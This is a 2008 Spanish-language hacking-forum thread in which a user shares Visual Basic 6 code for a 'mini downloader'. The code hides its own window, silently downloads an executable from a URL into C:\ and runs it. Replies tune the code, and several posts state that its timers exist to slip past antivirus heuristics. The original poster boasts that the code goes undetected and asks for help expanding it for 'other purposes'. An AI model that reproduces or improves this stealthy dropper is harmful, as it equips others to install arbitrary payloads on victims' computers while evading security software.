elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  mini y simple donwloader ejemplo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: mini y simple donwloader ejemplo  (Leído 3,497 veces)
?¿?

Desconectado Desconectado

Mensajes: 64



Ver Perfil
mini y simple donwloader ejemplo
« en: 14 Noviembre 2008, 19:48 pm »

buenas, queria compartir un codigo sin fines maleficos simplemente para demostrar que se puede hacer aunque algunos firewalls lo detecten.

kav, nod32, panda, avg, norton, mcafee, etc, no lo detectan, firewalls ya no se, pero mi fw xp no lo detecta por lo menos, saludos, aquí dejo el codigo.


Código:
Dim ejecutar As Long
Dim download As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub Form_Load()
Me.Hide
End Sub

Private Sub Timer1_Timer()
Me.Visible = False
download = URLDownloadToFile(0, "http://download.hijackthis.eu/HJTInstall.exe", "c:\ejemplohijackthis.exe", 0, 0)
Timer1.Enabled = False
End Sub

Private Sub Timer2_Timer()
ejecutar = ShellExecute(Me.hwnd, "Open", "c:\ejemplohijackthis.exe", "", "", 1)
Timer2.Enabled = False
End Sub

Private Sub Timer3_Timer()
Unload Me
End Sub

comenten, den ideas, opinen pero no falten al respeto, solo pido que se trate con el mismo respeto, gracias.  ;)


En línea

WestOn

Desconectado Desconectado

Mensajes: 272


El testamento Maya...


Ver Perfil
Re: mini y simple donwloader ejemplo
« Respuesta #1 en: 14 Noviembre 2008, 20:09 pm »

comenten, den ideas, opinen pero no falten al respeto, solo pido que se trate con el mismo respeto, gracias.  ;)
¿Quien te ha faltado al respeto anteriormente?..
¿Eres......? xD

un saludo

PD:Yo le pondria el Me.visible = false en el Form_load()
y los tiempos de los timers :P


« Última modificación: 14 Noviembre 2008, 20:35 pm por WestOn » En línea

En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
                                                                                                                                                                                                                            
?¿?

Desconectado Desconectado

Mensajes: 64



Ver Perfil
Re: mini y simple donwloader ejemplo
« Respuesta #2 en: 14 Noviembre 2008, 20:27 pm »

no simplemente lo dije porque he visto que en este foro hay chavales o gente que suele tener mala educacion y tratan bastante mal a la gente...solo por esa gente lo dije por ese grupo minoritario, descuida no lo digo por ti, saludos ;)
En línea

?¿?

Desconectado Desconectado

Mensajes: 64



Ver Perfil
Re: mini y simple donwloader ejemplo
« Respuesta #3 en: 14 Noviembre 2008, 21:03 pm »

WESTON: no cres, que eso de poner visible = false en el form load haga que sea muy agresivo para los avs y asi sea mas detectado???....  :huh: de momento solo detectan 4 segun mis pruebas las que hice. una vez una persona me dijo eso...por eso lo hice asi pero bueno alomejor tu te basas en otra cosa, no se si puedes explicarte, saludos, gracias men.  ;)
En línea

WestOn

Desconectado Desconectado

Mensajes: 272


El testamento Maya...


Ver Perfil
Re: mini y simple donwloader ejemplo
« Respuesta #4 en: 14 Noviembre 2008, 21:05 pm »

:laugh: no te alteres hombre q no es para tanto, puedes hacer lo q kieras respecto a tu code...

PD:Yo no me comeria la cabeza en camuflar ese code ;)
En línea

En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
                                                                                                                                                                                                                            
s E t H

Desconectado Desconectado

Mensajes: 152


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: mini y simple donwloader ejemplo
« Respuesta #5 en: 14 Noviembre 2008, 23:25 pm »

o entiendo para que usas los timers.. si la idea es hacer una pausa podes usar esto:

Código:
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: mini y simple donwloader ejemplo
« Respuesta #6 en: 15 Noviembre 2008, 02:44 am »

mmm la api Sleep no devuelve el control de la aplicacion (en este caso ya se que no importa)  pero trata de usar la funcion Timer con DoEvents o la api GetTickCount que no son como la Sleep que te "traba" todo...

saludos.
En línea

Zeroql


Desconectado Desconectado

Mensajes: 957


Todo lo k sucede sucede por una razon


Ver Perfil WWW
Re: mini y simple donwloader ejemplo
« Respuesta #7 en: 15 Noviembre 2008, 02:53 am »

es sencillo pero eficiente el code solo faltan algunos ajistes y te keda perfecto.
En línea

Dime y lo olvido, enseñame y lo recuerdo, involucrame y lo aprendo.
/.-ZEROQL.-\   -----  #937675#

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: mini y simple donwloader ejemplo
« Respuesta #8 en: 15 Noviembre 2008, 18:58 pm »

Citar
No entiendo para que usas los timers.. si la idea es hacer una pausa podes usar esto

No es para hacer ninguna pausa, es para eludir la eurística, no esty seguro de que un slepp funcionase para eso..
En línea

?¿?

Desconectado Desconectado

Mensajes: 64



Ver Perfil
Re: mini y simple donwloader ejemplo
« Respuesta #9 en: 16 Noviembre 2008, 18:42 pm »

sí, efectivamente EON !! lo hice porque nod32 le gusta cantar. si lo haces de ese modo pues se que mudo, si es sencillo como alguien por ahí dijo, aver si algunos aporta: opciones......algo de codigo( pistas para codear yo ) etc, aver si queda mas full y asi compartimos el codig o para cualquiera que quiera comprobarlo como funciona o como usar ese ejemplo con otros fines, no se....yo hace tiempo no no prendo el vb tengo que cojerle el hilo, gracias por sus comentarios, hasta otra se cuidan  ;)
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
simple ejemplo ;) sql~visual
.NET (C#, VB.NET, ASP)
_-Javier-_ 2 2,385 Último mensaje 21 Enero 2011, 01:03 am
por .:Snifer:.
Ayuda donwloader de troyano
Hacking
WIитX 2 2,828 Último mensaje 25 Octubre 2012, 20:25 pm
por WIитX
Ayuda con Donwloader Uso
Hacking
WIитX 0 1,795 Último mensaje 17 Enero 2013, 20:22 pm
por WIитX
contribución mini ejemplo de lenguaje interpretado
Java
sapito169 6 2,814 Último mensaje 21 Noviembre 2018, 17:28 pm
por sapito169
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines